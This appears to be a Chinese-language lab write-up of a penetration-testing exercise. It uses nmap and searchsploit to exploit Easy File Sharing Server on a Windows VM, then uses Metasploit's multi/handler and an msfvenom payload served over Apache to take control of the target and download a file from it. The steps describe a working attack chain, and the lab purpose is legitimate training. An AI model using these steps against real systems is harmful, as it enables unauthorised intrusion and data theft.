一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
先使用nmap指令扫出靶机IP192.168.79.132,然后 nmap -sV -A -o easy-file.txt ip 扫描一下,发现虚拟机已经运行了 文件easy file sharing server
使用命令:searchsploit easy file sharing得到以下画面
3、利用该漏洞,使得靶机运行计算器。P116-119
选择 39009的脚本,再次使用命令:searchsploit -m 39009
然后利用python +文件位置 + IP + 8000端口
最后Windows虚拟机上面打开了一个计算器
二、Metasploit应用
1、生成主控端、被控端。
首先输入msfconsole启动Metasploit,使用handler作为主控端
然后使用use exploit/multi/handler
还有分别建立 payload lhost lport
2、获得靶机(Windows)控制权。
ls查看当前目录
cd进入某个路径
msfvenom –p生成payload.exe
找到payload.exe
cp其到www/html/0.exe
放到网上
service apache2 start打开服务
service apache2 status查看状态
run运行网站
3、下载靶机上任意一个文件。
靶机输入主控机ip + /0.exe下载端口0
运行0端口,在桌面下载233.txt.txt
主控机之前还处于靶机桌面路径,直接下载文件到默认root文件即可